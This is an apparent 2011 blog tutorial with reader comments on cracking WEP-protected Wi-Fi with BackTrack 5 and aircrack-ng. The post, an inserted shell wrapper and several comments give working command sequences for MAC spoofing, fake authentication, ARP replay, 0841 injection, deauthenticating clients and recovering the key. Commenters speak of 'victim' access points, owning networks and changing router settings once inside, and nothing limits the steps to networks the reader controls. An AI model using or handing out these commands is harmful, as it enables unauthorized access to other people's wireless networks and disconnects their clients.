XeoShift

Changing how IT's done


How to crack WEP with BackTrack 5

Posted by Sean McCall on June 1, 2011 at 3:05 PM

1.)  Start monitor mode:

airmon-ng

        Copy down the interface name (e.g. wlan0)

airmon-ng start (interface)

        If it reports monitor mode enabled on "mon0" (or "wifi0" on older drivers), that is your new monitor interface

        If it lists processes that could cause trouble, type "kill (PID#)" for each, then run the start command again

 

2.)  Injection test:

aireplay-ng -9 (interface)

        APs that answer the broadcast probes are in range and injection works against them

        Copy down your target's BSSID, channel & ESSID

aireplay-ng -9 -e (ESSID) -a (BSSID) (interface)

        This tests one AP specifically; useful for verifying hidden SSIDs or alternative BSSIDs

 

3.)  Lock the card to the target's channel (injection only works when you are on the same channel as the AP):

airmon-ng start (interface) (channel)

 

4.)  Change MAC:

ifconfig (monitor interface) down

macchanger --mac (faked:mac) (monitor interface)

ifconfig (monitor interface) up

        Copy down faked:mac; it must match the -h value you give aireplay-ng in steps 6 & 7, otherwise aireplay-ng warns that the interface MAC doesn't match

        You don't need "airmon-ng stop" first; bringing the monitor interface down is enough

 

5.)  Begin packet capture:

airodump-ng -c (channel) -w (dump-name) --bssid (BSSID) (new interface)

        Watch for MACs of associated clients under STATION

        If there is one & step 6 isn't going well (e.g. the AP filters MACs), go back to step 4 and spoof that client's MAC

        You may have to bring down both the monitor interface & the physical one to change the MAC

 

6.)  Fake authentication:

*Put in second shell*

aireplay-ng -1 0 -a (BSSID) -h (faked:mac) (interface)

        With "-1 0" a successful run ends with "Association successful :-)"

        Using "aireplay-ng -1 6000 -o 1 -q 10 -a (BSSID) -h (faked:mac) (interface)" may help with picky routers: it re-authenticates every 6000 seconds, sends one set of packets at a time (-o 1) and a keep-alive every 10 seconds (-q 10)

 

7.)  ARP replay:

*Put in third shell*

aireplay-ng -3 -b (BSSID) -h (faked:mac) (interface)

        Once an ARP request has been captured and replayed, the #Data count in airodump-ng should climb quickly; if it stays flat, check that the fake authentication from step 6 is still holding

8.)  Crack WEP key:

*Put in a fourth shell*

aircrack-ng -b (BSSID) (dump-name)-01.cap

        Around 20,000 IVs are usually enough for a 64-bit key & 40,000 to 85,000 for a 128-bit key with the default PTW attack

        Try "aircrack-ng -n 64 (dump-name)*.cap" every 10,000 IVs to force a 64-bit key length; aircrack-ng also keeps re-reading the capture and retrying on its own as IVs come in

        If you know the start of the key in hexadecimal, give it as a mask with "-d", e.g. "-d 11:22:XX:XX:XX" where XX marks an unknown byte

        If the key is decimal digits only, add "-t" to search binary-coded-decimal bytes only

        If the key is alphanumeric (ASCII), add "-c" to search alphanumeric bytes only

        "-x1" (the default) brute forces the last key byte and "-x2" the last two; add "-x" to turn that off, e.g. when you are just checking quickly with very few IVs

        The fudge factor ("-f", default 2) belongs to the older Korek attack ("-K"); PTW doesn't use it. If you have fallen back to -K and are past 2,000,000 IVs with no key, try "-f 4" & let it run 30 minutes to an hour, then "-f 8" if that's unsuccessful
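The whole procedure from step 4 onwards, as an added example that is not part of the original post: a small shell wrapper that checks the BSSID, spoofed MAC and channel before anything touches the radio, builds the exact airodump-ng / aireplay-ng / aircrack-ng command lines used above, and by default only prints them. The interface name mon0, the MACs and the dump prefix in the usage line are placeholders; the WEP_DRY_RUN variable, the function names and their argument order are my own, not aircrack-ng's.

```sh
#!/bin/sh
# Added example, not from the original post: wraps steps 4-8 of the tutorial.
# Assumptions: the interface is already in monitor mode (airmon-ng start, step 1),
# and WEP_DRY_RUN (my own variable) defaults to 1 so nothing runs until you set it to 0.

# True if $1 looks like a MAC address such as 00:11:22:33:44:55
valid_mac() {
  printf '%s\n' "$1" | grep -Eqi '^([0-9a-f]{2}:){5}[0-9a-f]{2}$'
}

# True if $1 is a 2.4 GHz channel number (1-14)
valid_channel() {
  case "$1" in
    ''|*[!0-9]*) return 1 ;;
  esac
  [ "$1" -ge 1 ] && [ "$1" -le 14 ]
}

# Each builder prints the command line for one step so it can be checked before use
cmd_capture() {   # channel dump-prefix bssid monitor-iface   (step 5)
  printf 'airodump-ng -c %s -w %s --bssid %s %s\n' "$1" "$2" "$3" "$4"
}
cmd_fakeauth() {  # bssid faked-mac monitor-iface [keepalive=1]   (step 6)
  if [ "${4:-0}" = 1 ]; then
    printf 'aireplay-ng -1 6000 -o 1 -q 10 -a %s -h %s %s\n' "$1" "$2" "$3"
  else
    printf 'aireplay-ng -1 0 -a %s -h %s %s\n' "$1" "$2" "$3"
  fi
}
cmd_arpreplay() { # bssid faked-mac monitor-iface   (step 7)
  printf 'aireplay-ng -3 -b %s -h %s %s\n' "$1" "$2" "$3"
}
cmd_crack() {     # bssid dump-prefix   (step 8; airodump-ng names the file prefix-01.cap)
  printf 'aircrack-ng -b %s %s-01.cap\n' "$1" "$2"
}

# Print the command, or run it when WEP_DRY_RUN=0
run() {
  if [ "${WEP_DRY_RUN:-1}" = 1 ]; then
    printf '[dry-run] %s\n' "$1"
  else
    eval "$1"
  fi
}

# wep_attack <monitor-iface> <bssid> <channel> <faked-mac> <dump-prefix>
# Returns 1 without running anything if an argument is malformed.
wep_attack() {
  [ $# -eq 5 ] || { echo "usage: wep_attack iface bssid channel faked_mac dump" >&2; return 1; }
  mon=$1; bssid=$2; channel=$3; fakemac=$4; dump=$5
  valid_mac "$bssid"       || { echo "bad BSSID: $bssid" >&2; return 1; }
  valid_mac "$fakemac"     || { echo "bad spoofed MAC: $fakemac" >&2; return 1; }
  valid_channel "$channel" || { echo "bad channel: $channel" >&2; return 1; }

  # step 4: spoof the MAC on the monitor interface (it must match -h below)
  run "ifconfig $mon down && macchanger --mac $fakemac $mon && ifconfig $mon up"
  # step 3: lock the card to the target's channel
  run "iwconfig $mon channel $channel"
  # steps 5-7 run concurrently, like the separate shells in the tutorial;
  # fake auth keeps its output so "Association successful" stays visible
  run "$(cmd_capture "$channel" "$dump" "$bssid" "$mon") >/dev/null 2>&1 &"
  run "$(cmd_fakeauth "$bssid" "$fakemac" "$mon" 1) &"
  run "$(cmd_arpreplay "$bssid" "$fakemac" "$mon") >/dev/null 2>&1 &"
  # step 8: aircrack-ng re-reads the growing capture and retries as IVs arrive
  run "$(cmd_crack "$bssid" "$dump")"
}

# Usage (placeholders; only prints the commands until WEP_DRY_RUN=0):
#   wep_attack mon0 00:11:22:33:44:55 6 00:11:22:33:44:66 wep
```

Run it once in dry-run mode and compare the printed lines with the steps above before setting WEP_DRY_RUN=0; the validation is there because a mistyped BSSID or channel otherwise just produces an empty capture with no error from the tools.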


*    Other attack methods:

Injection attack with 2 wireless cards:

        aireplay-ng -9 -i (receiving interface) (injecting interface)

                If the test fails on Attack -5 (fragmentation), make sure the injecting interface's MAC matches the card's current MAC

 

Deauthentication attack:

        aireplay-ng --deauth 5 -a (BSSID) -c (client MAC) (interface)

                When the client reconnects it usually sends an ARP request, which feeds the ARP replay in step 7; faster than waiting for one to turn up, but you need the MAC of a client that is associated right now

                This disconnects that client, so they may notice


15 Comments

Reply Shade Emry
9:02 PM on November 22, 2011 
Nicely Done
Reply Scorpion
7:44 PM on March 2, 2012 
Four PIDs came out when I tried to start airmon-ng, and even though I killed all of them there is always one that stays and doesn't let me start airmon. Can anyone help me with that?
Reply dileep
12:45 AM on April 29, 2012 
Hi, thanks for the post. When I type "airmon-ng" nothing shows up, but I'm connected to the router.
Reply Sean McCall
3:22 PM on April 30, 2012 
You shouldn't have DHCP services running, much less be connected to the router you're trying to crack...
Reply Arvind
1:04 PM on May 11, 2012 
dileep says...
Hi, thanks for the post. When I type "airmon-ng" nothing shows up, but I'm connected to the router.

You have to type airmon-ng wlan0, where wlan0 is your network adapter.
Reply wifreenitum
5:22 PM on June 13, 2012 
About step 4, Change MAC: airmon-ng stop (interface), ifconfig (interface) down, macchanger --mac (faked:mac) (interface). You don't need to use airmon-ng stop (interface) before changing the MAC, just ifconfig (monitor_interface) down.
The fudge factor is completely unnecessary, and neither is brute forcing the last bytes with the latest versions of aircrack (1.0/1.1). Nice tips for varying aircrack behavior though,
like if you know the start of the key.
Know your tools.
Reply Sean McCall
7:42 PM on June 13, 2012 
wifreenitum says...
About step 4, Change MAC: airmon-ng stop (interface), ifconfig (interface) down, macchanger --mac (faked:mac) (interface). You don't need to use airmon-ng stop (interface) before changing the MAC, just ifconfig (monitor_interface) down.
The fudge factor is completely unnecessary, and neither is brute forcing the last bytes with the latest versions of aircrack (1.0/1.1). Nice tips for varying aircrack behavior though,
like if you know the start of the key.
Know your tools.


Thanks, I have quite a few revisions to make to this; I didn't think it would become a top Google result. I think I might make a YouTube video demonstrating the chop-chop & fragmentation attack methods in addition to the basics.
Reply marcos
7:48 PM on June 13, 2012 
My tried and true way to crack most WEP-based APs.
Step 1 is OK, and nice tip about killing the PID responsible for the wifi interface in use.
If the driver is ath9k the client-mode interface is wlan0, but sometimes it's some high number like wlan17; that's a BT5 bug not present in the older version, or it could be a driver issue. Also power readings are different, and changing txpower is restricted also for rtl8187 and Atheros.
I use yakuake because I can copy/paste to a template of commands and replace BSSID, ESSID and channel in all commands using kwrite, then copy those commands, reveal yakuake with F12 and paste the commands in the console. It's almost as fast as using some spoonfeeder app like gtk-wep in Beini. Select text to replace throughout the template, Ctrl+C, Ctrl+R, paste the text to replace and press enter twice. Open 3 tabs with Ctrl+N or Ctrl+T depending on the version or setup of yakuake.
1) Check wifi interfaces: (rmmod unneeded cards by their driver name as listed in the lsmod command if you are using an external USB adapter like an Alfa rtl8187 or a similar generic wifi adapter.)
iwconfig
2) Start monitor mode: (the injection test is fine, but in Mexico the Prodigy Infinitum ISP is own3d and completely injectable.)
airmon-ng start [interface returned from iwconfig in step one]
Make note of the monitor interface.
3) Do an initial scan for victim access points:
airodump-ng mon0
Copy down your target's BSSID, channel & ESSID
4) Change the channel of the monitor interface to the channel of the target access point:
iwconfig mon0 channel [channel_of_target_ap]
5) Lower the bit rate to 1 Mbit to increase receive quality (see RXQ in the manpage for airodump-ng):
Basically this allows more packets to get through to the AP if it's set to 54 Mbit and you are further away or in a bad position, or if interfering APs are nearby. This also increases the injection rate and the chance of success when doing the fake authentication step.
iwconfig mon0 rate 1M
6) Change the MAC of the monitor interface (optional but recommended, especially for hiding your traces or spoofing a client MAC if MAC filtering is enabled on the AP). You can make a script to avoid typing too much.
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up
Make a small script and put steps 4-6 in one command:
nano macspoof
#!/bin/sh
# start of script
# usage: macspoof <monitor_interface> <channel> <faked_mac>
[ $# -eq 3 ] || { echo "usage: $0 interface channel mac" >&2; exit 1; }
iwconfig "$1" channel "$2"
ifconfig "$1" down
macchanger -m "$3" "$1"
ifconfig "$1" up
iwconfig "$1" rate 1M
# end of script
Make the script executable:
chmod +x macspoof
E.g. ./macspoof [interface] [channel_of_victim_AP] [faked_mac]
7) Begin packet capture in the first terminal window or tab in yakuake:
airodump-ng -c (channel) -w (a dump-name like capture) --bssid (BSSID) (monitor interface, which in this case is mon0)
If the ESSID is hidden you can do a deauth on a client in range connected to the AP.
aireplay-ng -0 5 -a (BSSID) -c (mac_of_client_to_be_kicked) (interface)
You can simultaneously capture and deauth; just repeat step 2 with airmon-ng and create a second monitor interface like mon1 and use that instead of mon0, which is being used by airodump-ng while capturing packets.
8) Fake authentication:
*Put in second shell or tab in yakuake*
aireplay-ng -1 0 -a (BSSID) -h (faked:mac) (interface)
Successful authentication will continually send keep-alive packets.
Using "aireplay-ng -1 6000 -o 1 -q 10 -a (BSSID) -h (faked:mac) (interface)" may help for picky routers.
9) Use the easy injecting 0841 attack (in another tab of yakuake):
aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b (BSSID) -h (faked:mac) (interface)
If the AP uses migration mode (in airodump-ng the AP appears as 54e under the MB column) use this command in the same tab (aircrack version 1.1):
aireplay-ng -8 -b (BSSID) -h (faked:mac) (interface)
When a packet is received, type y then enter and injection will begin.
10) Crack the WEP key. In another terminal window or yakuake tab type:
aircrack-ng -b (BSSID) -Z capture*.cap
Or if cracking an AP using migration mode (54e):
aircrack-ng -a 1 -b (BSSID) -z capture*.cap

You should see the key in hex or ASCII format at the end of about 20000 to 23000 packets, or less; I've never had to wait that long.

You should keep a list of all the networks you know you 0wn. Using nano in another terminal window, copy/paste the relevant data from airodump and then the key at the end.
I hope I have enlightened anyone or helped out with my tips.
Beini also is pretty good with 11e/54e (WEP/WPA migration) networks. It's worth a try for noobs.
Reply Sean McCall
8:06 PM on June 13, 2012 
marcos says...
tl;dr (JK, I did, just wanted to shorten the quote)

I'll be sure to test some of this, and then do what I did above, AKA translate it into an easy, step-by-step tutorial that anyone could use. I appreciate you taking the time to share your methods; it sounds like you do this a little more than I do. I originally wrote this for myself as I tried to translate similar write-ups. After the effort, I figured it was worth sharing ^^
Reply wifreenitum
6:22 PM on June 14, 2012 
Sean McCall says...
I'll be sure to test some of this, and then do what I did above, AKA translate it into an easy, step-by-step tutorial that anyone could use. I appreciate you taking the time to share your methods; it sounds like you do this a little more than I do. I originally wrote this for myself as I tried to translate similar write-ups. After the effort, I figured it was worth sharing ^^


I also like to use my Galaxy Epic to pinpoint closer networks because of its less powerful wifi. It makes things faster and smoother to lower the bit rate on the crack, and once you get access, modify the configuration of the bit rate on the wireless router/AP also. That way your wireless adapter is always forced to connect at that rate, which gives better range/immunity to interference and improves throughput to the internet, although not between machines on a local network while sending files. If you just use the internet and don't need the high local network bandwidth, then lower the wifi bit rate to the maximum internet download bandwidth assigned by your provider.
Reply serin
9:53 AM on July 20, 2012 
I am getting just 3 IVs in an hour. Somebody please help.
Reply Federico
1:40 PM on August 25, 2012 
A bash script to automate the WEP cracking process can be found on:
http://pastebin.com/ga8t9fz7
Reply emmi
10:42 AM on September 26, 2012 
I need this software.
Reply Sean McCall
11:26 AM on September 26, 2012 
emmi says...
I need this software.

It's available in the Downloads section along with many other useful applications ;)
Reply MMMMM
5:15 AM on July 25, 2013 
What is dump-name and faked:mac... I don't know what they are.